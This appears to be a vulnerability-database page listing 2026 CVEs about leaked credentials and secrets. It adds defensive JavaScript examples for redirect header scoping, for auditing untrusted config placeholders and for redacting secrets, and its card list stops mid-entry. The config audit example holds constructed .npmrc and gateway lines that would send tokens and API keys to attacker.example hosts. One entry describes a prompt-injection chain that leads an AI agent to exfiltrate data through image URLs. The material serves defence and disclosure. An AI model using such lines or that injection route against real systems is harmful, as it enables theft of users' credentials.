| CVE | Severity | CVSS | EPSS | | Fix | Published | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-13211 | Medium | 4.3 v3 | - | - | No fix available yet | 2026-07-01 | The genucenter web interface before version 8.0p11 unnecessarily exposes sensitive SNMP authentication and encryption keys in its HTTP responses to users with the “Service” or “Admin” role. |
| CVE-2026-12085 | Medium | 6.5 v3 | - | - | No fix available yet | 2026-06-30 | IBM UrbanCode Deploy 7.3 through 7.3.2.18 and IBM DevOps Deploy 8.0 through 8.0.1.13, 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 could disclose sensitive configurations and secrets to authenticated users in API responses that could be used in further attacks against the system. |
| CVE-2026-13437 | Medium | 6.5 v3 | 0.2% | - | No fix available yet | 2026-06-29 | Insertion of sensitive information into sent data in the AI Agent job API in Devolutions PowerShell Universal 2026.2.0 allows an authenticated user with AI Agent read access to obtain reusable, potentially higher-privileged authentication tokens via App Tokens serialized in plaintext in job API responses. |
| CVE-2026-57318 | Medium | 6.5 v3 | 0.4% | - | No fix available yet | 2026-06-26 | Subscriber Sensitive Data Exposure in Site Reviews <= 8.0.11 versions. |
| CVE-2026-54834 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-26 | Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone <= 2.3.2 versions. |
| CVE-2026-55180 | Medium | 6.5 v3 | 0.2% | - | Fix available | 2026-06-25 | pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3. |
| CVE-2026-54848 | High | 8.3 v3 | 0.2% | - | No fix available yet | 2026-06-25 | Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal APIExperts Square for WooCommerce allows Retrieve Embedded Sensitive Data. This issue affects APIExperts Square for WooCommerce: from n/a through 4.7.3. |
| CVE-2026-54841 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-25 | Unauthenticated Sensitive Data Exposure in Vitepos <= 3.4.2 versions. |
| CVE-2026-54821 | High | 7.4 v3 | 0.3% | - | No fix available yet | 2026-06-25 | Subscriber Sensitive Data Exposure in Visual Link Preview <= 2.3.1 versions. |
| CVE-2026-22551 | Medium | 6.5 v3 | 0.2% | - | Fix available | 2026-06-18 | In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces. |
| CVE-2026-52698 | High | 7.4 v3 | 0.2% | - | No fix available yet | 2026-06-17 | Subscriber Sensitive Data Exposure in PushEngage – Web Push Notifications, eCommerce Automation & Chat Widget <= 4.2.3 versions. |
| CVE-2026-34888 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-17 | Unauthenticated Sensitive Data Exposure in Bricksforge <= 3.1.8.4 versions. |
| CVE-2026-27868 | Medium | 6.9 v4 | 0.4% | - | No fix available yet | 2026-06-17 | An attacker with network access to a Teldat Regesta Smart HD-PLC running the vulnerable software (no registration action is required) can obtain privileged information by issuing the Version command via the path /upgrade/query.php?cmd=p+3&3Bversion, resulting in information disclosure. This issue affects Regesta Smart HD-PLC - TLDPH16D2: 11.02.05.10.02. |
| CVE-2024-35690 | Medium | 6.5 v3 | 0.3% | - | No fix available yet | 2026-06-17 | Insertion of sensitive information into sent data vulnerability in MarketingFire Widget Options allows Retrieve Embedded Sensitive Data. This issue affects Widget Options: from n/a through 4.0.1. |
| CVE-2026-54197 | Medium | 6.5 v3 | 0.2% | - | No fix available yet | 2026-06-16 | Unauthenticated Sensitive Data Exposure in GetGenie <= 4.4.1 versions. |
| CVE-2026-52695 | High | 7.5 v3 | 0.2% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in ABC Crypto Checkout <= 1.8.2 versions. |
| CVE-2026-52692 | High | 7.5 v3 | 0.2% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Affiliates Manager <= 2.9.50 versions. |
| CVE-2026-49082 | High | 7.4 v3 | 0.3% | - | No fix available yet | 2026-06-15 | Subscriber Sensitive Data Exposure in Chatway Live Chat – AI Chatbot, Customer Support, FAQ & Helpdesk Customer Service & Chat Buttons <= 1.4.8 versions. |
| CVE-2026-48965 | Medium | 6.5 v3 | 0.3% | - | No fix available yet | 2026-06-15 | Subscriber Sensitive Data Exposure in XCloner <= 4.8.6 versions. |
| CVE-2026-42667 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Bookly <= 27.4 versions. |
| CVE-2026-42384 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Simply Schedule Appointments < 1.6.11.2 versions. |
| CVE-2026-40789 | High | 7.5 v3 | 0.3% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Amelia <= 2.2 versions. |
| CVE-2026-39480 | High | 7.5 v3 | 0.4% | - | No fix available yet | 2026-06-15 | Unauthenticated Sensitive Data Exposure in Backup Migration <= 2.1.1 versions. |
| CVE-2026-49064 | High | 7.5 v3 | 0.2% | - | No fix available yet | 2026-06-15 | Insertion of Sensitive Information Into Sent Data vulnerability in Stiofan GetPaid allows Retrieve Embedded Sensitive Data. This issue affects GetPaid: from n/a through 2.8.49. |
| CVE-2026-7184 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-06-12 | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the `manage_secure_connections` permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint. Mattermost Advisory ID: MMSA-2026-00662 |
| CVE-2026-44487 | High | 7.5 v3 | 0.7% | - | Fix available | 2026-06-11 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0. |
| CVE-2026-44486 | High | 7.5 v3 | 0.5% | - | Fix available | 2026-06-11 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0. |
| CVE-2026-46481 | High | 8.3 v3 | 0.2% | - | No fix available yet | 2026-06-08 | OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4. |
| CVE-2026-42539 | Medium | 6.5 v3 | 0.2% | - | No fix available yet | 2026-06-04 | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user that is not required for the client’s operation. Version 2.4.28 contains a patch. |
| CVE-2026-45739 | Low | 3.1 v3 | 0.2% | - | Fix available | 2026-06-04 | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue. |
| CVE-2026-4035 | High | 7.7 v3 | 0.4% | - | Fix available | 2026-06-03 | A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets, which can be exploited to exfiltrate sensitive server-side environment credentials to an attacker-controlled endpoint. This issue arises because the `api_key` field in gateway secrets can accept `$ENV_VAR` references, which are resolved against the MLflow server's environment during runtime. The resolved secrets are then sent in provider authentication headers to the configured upstream `api_base`. This vulnerability can be exploited by low-privileged authenticated users in basic-auth deployments or by unauthenticated users in default deployments without `basic-auth`. The impact includes potential leakage of sensitive credentials such as cloud artifact credent |
| CVE-2026-44653 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-06-02 | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8.4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting apiKey.key and oauth.client_secret from all API responses; considering returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edi |
| CVE-2026-35447 | Medium | 5.3 v4 | 0.2% | - | No fix available yet | 2026-06-02 | NamelessMC is website software for Minecraft servers. In version 2.2.4, the profile page (modules/Core/pages/profile.php) processes wall post submissions and replies before verifying whether the viewer is authorized to access the profile. This allows any user with the profile.post permission to write wall posts to private or blocking profiles. Additionally, the reply branch does not verify that the target wall post belongs to the current profile, enabling attackers to inject replies into arbitrary wall posts owned by other profiles via a restricted profile URL. This is patched in version 2.2.5. |
| CVE-2026-42673 | High | 7.5 v3 | 0.2% | - | No fix available yet | 2026-06-01 | Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6. |
| CVE-2026-49370 | Low | 3.4 v3 | 0.2% | - | Fix available | 2026-05-29 | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests. |
| CVE-2026-10101 | Medium | 6.3 v3 | 0.2% | - | No fix available yet | 2026-05-29 | ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`. |
| CVE-2026-45582 | Medium | 6.5 v3 | 0.3% | - | Fix available | 2026-05-29 | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters — such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters — could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3. |
| CVE-2026-42746 | High | 7.3 v3 | 0.2% | - | No fix available yet | 2026-05-27 | Insertion of Sensitive Information Into Sent Data vulnerability in ZAYTECH Smart Online Order for Clover clover-online-orders allows Retrieve Embedded Sensitive Data. This issue affects Smart Online Order for Clover: from n/a through <= 1.6.0. |
| CVE-2026-48877 | Medium | 6.5 v3 | 0.3% | - | No fix available yet | 2026-05-27 | Insertion of Sensitive Information Into Sent Data vulnerability in Tom GenerateBlocks allows Retrieve Embedded Sensitive Data. This issue affects GenerateBlocks: from n/a through 2.1.0. |
| CVE-2026-41181 | Medium | 5.8 v3 | 0.4% | - | Fix available | 2026-05-15 | Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose |
| CVE-2025-62309 | Low | 2.6 v3 | 0.1% | - | No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions. |
| CVE-2025-62308 | Medium | 5.1 v3 | 0.1% | - | No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions. |
| CVE-2025-62305 | Medium | 5.1 v3 | 0.1% | - | No fix available yet | 2026-05-14 | HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions. |
| CVE-2026-45215 | Medium | 5.3 v3 | 0.2% | - | No fix available yet | 2026-05-12 | Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data. This issue affects WP EasyPay: from n/a through <= 4.3.0. |
| CVE-2026-42880 | Critical | 9.6 v3 | 0.5% | - | Fix available | 2026-05-07 | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9. |
| CVE-2025-31978 | Medium | 4.6 v3 | 0.1% | - | No fix available yet | 2026-05-06 | HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content. |
| CVE-2026-42997 | High | 7.7 v3 | 0.4% | - | Fix available | 2026-05-05 | An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1. |
| CVE-2026-42379 | High | 7.7 v3 | 0.2% | - | No fix available yet | 2026-04-27 | Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data. This issue affects Templately: from n/a through 3.6.1. |
| CVE-2026-42042 | Medium | 5.4 v3 | 0.2% | - | Fix available | 2026-04-24 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1. |
| CVE-2026-5512 | Medium | 4.3 v3 | 0.3% | - | Fix available | 2026-04-21 | An improper authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated attacker to determine the names of private repositories by their numeric ID. The mobile upload policy API endpoint did not perform an early authorization check, and validation error messages included the full repository name for repositories the caller did not have access to. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.1, 3.19.5, 3.18.8, 3.17.14, 3.16.17, 3.15.21, and 3.14.26. This vulnerability was reported via the GitHub Bug Bounty program. |
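The two Axios redirect entries (CVE-2026-44486, CVE-2026-44487) and the `withXSRFToken` entry (CVE-2026-42042) describe one failure in three shapes: a credential issued for one party is carried to another. The block below is an added example, not Axios code, of how an HTTP client can scope credential-bearing headers per hop. The functions `headersForRedirect`, `proxyForTarget` and `shouldAttachXsrfToken`, the NO_PROXY-style bypass list and the `true`/`false`/other semantics of the XSRF flag are assumptions made for the example; the rule that Authorization and Cookie are dropped on a cross-origin redirect is a general hardening (the Fetch standard strips Authorization the same way) and is not taken from the entries.

```javascript
// Added example (not Axios source). Scopes credential-bearing headers to the hop
// they were issued for: proxy credentials are rebuilt per hop from the proxy the
// new target actually uses, origin-bound credentials survive only same-origin
// redirects, and the XSRF opt-in is a strict boolean check. All names and the
// NO_PROXY-style bypass list are hypothetical.

const PROXY_CREDENTIAL_HEADERS = new Set(['proxy-authorization']);
const ORIGIN_CREDENTIAL_HEADERS = new Set(['authorization', 'cookie']);

function originOf(url) {
  return new URL(url).origin; // scheme + host + port, e.g. "https://api.example:8443"
}

// Which proxy (if any) serves targetUrl. `noProxy` lists hostnames, or ".suffix"
// patterns, that bypass the proxy, in the spirit of NO_PROXY.
function proxyForTarget(targetUrl, proxy, noProxy = []) {
  if (!proxy) return null;
  const host = new URL(targetUrl).hostname;
  const bypass = noProxy.some((p) =>
    p.startsWith('.') ? host === p.slice(1) || host.endsWith(p) : host === p
  );
  return bypass ? null : proxy;
}

function basicProxyAuth({ username, password }) {
  return 'Basic ' + Buffer.from(`${username}:${password}`).toString('base64');
}

// Header set for the request that follows a 3xx from prevUrl to nextUrl.
function headersForRedirect(prevHeaders, prevUrl, nextUrl, { proxy = null, noProxy = [] } = {}) {
  const kept = {};
  const dropped = [];
  const crossOrigin = originOf(prevUrl) !== originOf(nextUrl);
  for (const [name, value] of Object.entries(prevHeaders)) {
    const key = name.toLowerCase();
    // Never copy a proxy credential forward; it is re-derived below from config,
    // so a "stale" Proxy-Authorization cannot exist on the redirected request.
    if (PROXY_CREDENTIAL_HEADERS.has(key)) { dropped.push(name); continue; }
    // Authorization and Cookie were issued for the original origin only.
    if (ORIGIN_CREDENTIAL_HEADERS.has(key) && crossOrigin) { dropped.push(name); continue; }
    kept[name] = value;
  }
  const nextProxy = proxyForTarget(nextUrl, proxy, noProxy);
  if (nextProxy && nextProxy.auth) kept['Proxy-Authorization'] = basicProxyAuth(nextProxy.auth);
  return { headers: kept, dropped, viaProxy: nextProxy !== null };
}

// XSRF token policy. `true` means "attach even cross-origin", `false` means never,
// and anything else (undefined, or a truthy object planted via prototype
// pollution) falls back to the same-origin rule instead of counting as the opt-in.
function shouldAttachXsrfToken(withXSRFToken, targetUrl, pageOrigin) {
  if (withXSRFToken === true) return true;
  if (withXSRFToken === false) return false;
  return originOf(targetUrl) === pageOrigin;
}
```

The design point is in `headersForRedirect`: a client that rebuilds `Proxy-Authorization` from its proxy configuration on every hop has nothing to forget to strip, which is a stronger position than remembering to remove it in the proxy-to-direct case.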
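The pnpm entry (CVE-2026-55180) and the MLflow AI Gateway entry (CVE-2026-4035) share a mechanism: a configuration value that an untrusted party wrote contains an environment-variable reference, the software resolves it against the victim's environment, and the result is sent to a destination the same party chose. The block below is an added example, not pnpm, pacquet or MLflow code, of auditing such config before anything expands it and of gating expansion on where the file came from. The `.npmrc` reader, the `classifyKey` heuristics, the sample `.npmrc` text, the sample gateway secret and the variable names are constructed for the example; refusing expansion from untrusted sources is one possible policy, not a description of how either project fixed its issue.

```javascript
// Added example, not pnpm, pacquet or MLflow code. Finds environment-variable
// placeholders in configuration an untrusted party wrote, classifies what an
// expansion would have done with the value, and only expands when the file came
// from a trusted source. The .npmrc text, gateway secret and variable names are
// constructed for the example.

const PLACEHOLDER = /\$\{([A-Za-z_][A-Za-z0-9_]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)/g;

// Minimal .npmrc reader: "key=value" lines, '#' and ';' comments ignored.
function parseNpmrc(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    entries.push({ key: line.slice(0, eq).trim(), value: line.slice(eq + 1).trim() });
  }
  return entries;
}

function envReferences(value) {
  return [...String(value).matchAll(PLACEHOLDER)].map((m) => m[1] || m[2]);
}

// Where an expanded value ends up: the request destination (the variable's value
// becomes part of a URL the client connects to) or a credential sent to it.
function classifyKey(key) {
  if (/(^|:)registry$/.test(key) || /^api_base$/.test(key)) return 'destination';
  if (/(_authToken|_auth|_password|api_key)$/i.test(key)) return 'credential';
  return 'other';
}

// Every placeholder in untrusted config is a finding, with the sink it would feed.
function auditUntrustedConfig(entries) {
  const findings = [];
  for (const { key, value } of entries) {
    const vars = envReferences(value);
    if (vars.length) findings.push({ key, vars, sink: classifyKey(key) });
  }
  return findings;
}

// Expansion gated on provenance: the user's own config may reference the
// environment; a file from the repository being installed may not.
function expandValue(value, env, { trusted }) {
  const refs = envReferences(value);
  if (!trusted && refs.length) {
    throw new Error(`refusing to expand ${refs.join(', ')} from untrusted config`);
  }
  if (!trusted) return value;
  return value.replace(PLACEHOLDER, (_, braced, bare) => env[braced || bare] ?? '');
}

// Constructed sample: a project .npmrc that a malicious repository could ship.
const SAMPLE_NPMRC = [
  '# project-level .npmrc (constructed)',
  'registry=https://${NPM_TOKEN}@registry.attacker.example/',
  '//registry.attacker.example/:_authToken=${GITHUB_TOKEN}',
  '@corp:registry=https://npm.corp.example/',
  'strict-ssl=true',
].join('\n');

// Constructed sample in the shape of a gateway secret whose api_base the
// submitting user also chose.
const SAMPLE_GATEWAY_SECRET = { api_key: '$OPENAI_API_KEY', api_base: 'https://llm.attacker.example/v1' };

function auditObject(obj) {
  return auditUntrustedConfig(Object.entries(obj).map(([key, value]) => ({ key, value })));
}
```

Run `auditUntrustedConfig(parseNpmrc(SAMPLE_NPMRC))` to see the two findings: the `registry` line would put the token into the connection target itself (the userinfo part of the URL, so a TLS handshake to the attacker's host already carries it), and the `_authToken` line would send a second variable as a credential. `auditObject(SAMPLE_GATEWAY_SECRET)` reports the `api_key` reference; the `api_base` next to it is where the resolved value would be sent.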
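Most entries in this list are the same server-side mistake: a response object is serialised whole, and the object happens to hold a secret (the LibreChat `apiKey.key` and `oauth.client_secret`, the OpenMetadata `connection.config.password` and `securityConfig.jwtToken`, the Mattermost remote cluster token, the pull secret written into `InfraEnv.status`). The LibreChat entry names the remediation: redact the known fields and return only a boolean presence indicator. The block below is an added example, not code from any of those projects, of a policy-driven redaction step plus a shape-based guard that fails the response if a credential survives at a path the policy did not list. The `SECRET_PATHS` list, the credential regexes and `SAMPLE_RESPONSE` are constructed for the example.

```javascript
// Added example, not code from LibreChat, OpenMetadata or Mattermost. Redacts
// fields an API owner knows are secrets, replacing each with a presence indicator
// as the LibreChat entry suggests, then runs a shape-based guard so that a secret
// at a path the policy forgot still fails the response instead of shipping. The
// paths, regexes and SAMPLE_RESPONSE are constructed for the example.

// Dotted paths known to hold secrets. "[]" matches any array index, "*" any one segment.
const SECRET_PATHS = [
  'apiKey.key',
  'oauth.client_secret',
  'connection.config.password',
  'openMetadataServerConnection.securityConfig.jwtToken',
  'remoteClusters[].token',
];

function isSecretPath(path) {
  const q = path.replace(/\[\d+\]/g, '[]').split('.');
  return SECRET_PATHS.some((pattern) => {
    const p = pattern.split('.');
    return p.length === q.length && p.every((seg, i) => seg === '*' || seg === q[i]);
  });
}

// Deep copy with every secret path replaced by { present: boolean }.
function redact(value, path = '') {
  if (Array.isArray(value)) return value.map((v, i) => redact(v, `${path}[${i}]`));
  if (value && typeof value === 'object') {
    const out = {};
    for (const [k, v] of Object.entries(value)) {
      const child = path ? `${path}.${k}` : k;
      out[k] = isSecretPath(child) ? { present: v != null && v !== '' } : redact(v, child);
    }
    return out;
  }
  return value;
}

// Values that look like credentials regardless of what the field is called.
const CREDENTIAL_SHAPES = [
  /^eyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}$/, // JWS compact form (a JWT)
  /^Bearer\s+\S{16,}$/i,
  /^AKIA[0-9A-Z]{16}$/,           // AWS access key id
  /^gh[pousr]_[A-Za-z0-9]{36}$/,  // GitHub token
  /^-----BEGIN [A-Z ]*PRIVATE KEY-----/,
];
// Field names that should never carry a non-empty string to the wire.
const SECRET_NAME = /(password|passwd|secret|token|jwt|api[_-]?key|private[_-]?key)$/i;

// Returns the paths of string leaves that still look like secrets.
function findLeakedSecrets(value, path = '', out = []) {
  if (Array.isArray(value)) {
    value.forEach((v, i) => findLeakedSecrets(v, `${path}[${i}]`, out));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) findLeakedSecrets(v, path ? `${path}.${k}` : k, out);
  } else if (typeof value === 'string' && value !== '') {
    const field = path.split('.').pop().replace(/\[\d+\]$/, '');
    if (SECRET_NAME.test(field) || CREDENTIAL_SHAPES.some((re) => re.test(value))) out.push(path);
  }
  return out;
}

// Wire serialisation: policy redaction, then the guard. Throwing turns a silent
// leak into a failed response and a log line, which is the better failure mode.
function serializeResponse(body) {
  const safe = redact(body);
  const leaks = findLeakedSecrets(safe);
  if (leaks.length) throw new Error(`refusing to send secrets at: ${leaks.join(', ')}`);
  return JSON.stringify(safe);
}

// Constructed sample body using the field names from the entries above.
const SAMPLE_RESPONSE = {
  name: 'prod-warehouse',
  apiKey: { key: 'sk-live-0123456789abcdef', type: 'user_provided' },
  oauth: { client_id: 'mcp-client', client_secret: 'c1ientS3cret' },
  connection: { config: { host: 'db.internal', username: 'ingest', password: 'Pa55w0rd!' } },
  remoteClusters: [{ name: 'eu', token: 'rc_tok_abcdef' }],
  owner: { name: 'alice', email: 'alice@example.test' },
};
```

The same guard belongs in front of any sink that non-secret-readers can see, not only HTTP bodies: the `InfraEnv.status` entry above is a validation error message that carried the secret it was complaining about, and `findLeakedSecrets` run over the message before it is written to status would have caught the `auth` and `password` fields.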
- MediumCVSS 4.3 v3·EPSS -·No fix yet
The genucenter web interface before version 8.0p11 unnecessarily exposes sensitive SNMP authentication and encryption keys in its HTTP responses to users with the “Service” or “Admin” role.
Published 2026-07-01
- MediumCVSS 6.5 v3·EPSS -·No fix yet
IBM UCD - IBM UrbanCode Deploy 7.3 through 7.3.2.18 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.13, 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 IBM DevOps Deploy could disclose sensitive configurations and secrets to authenticated users in API responses that could be used in further attacks against the system.
Published 2026-06-30
- MediumCVSS 6.5 v3·EPSS 0.2%·No fix yet
Insertion of sensitive information into sent data in the AI Agent job API in Devolutions PowerShell Universal 2026.2.0 allows an authenticated user with AI Agent read access to obtain reusable, potentially higher-privileged authentication tokens via App Tokens serialized in plaintext in job API responses.
Published 2026-06-29
- MediumCVSS 6.5 v3·EPSS 0.4%·No fix yet
Subscriber Sensitive Data Exposure in Site Reviews <= 8.0.11 versions.
Published 2026-06-26
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone <= 2.3.2 versions.
Published 2026-06-26
- MediumCVSS 6.5 v3·EPSS 0.2%·Fix available
pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.
Published 2026-06-25
- HighCVSS 8.3 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal APIExperts Square for WooCommerce allows Retrieve Embedded Sensitive Data. This issue affects APIExperts Square for WooCommerce: from n/a through 4.7.3.
Published 2026-06-25
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Vitepos <= 3.4.2 versions.
Published 2026-06-25
- HighCVSS 7.4 v3·EPSS 0.3%·No fix yet
Subscriber Sensitive Data Exposure in Visual Link Preview <= 2.3.1 versions.
Published 2026-06-25
- MediumCVSS 6.5 v3·EPSS 0.2%·Fix available
In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces.
Published 2026-06-18
- HighCVSS 7.4 v3·EPSS 0.2%·No fix yet
Subscriber Sensitive Data Exposure in PushEngage – Web Push Notifications, eCommerce Automation & Chat Widget <= 4.2.3 versions.
Published 2026-06-17
- HighCVSS 7.5 v3·EPSS 0.3%·No fix yet
Unauthenticated Sensitive Data Exposure in Bricksforge <= 3.1.8.4 versions.
Published 2026-06-17
- MediumCVSS 6.9 v4·EPSS 0.4%·No fix yet
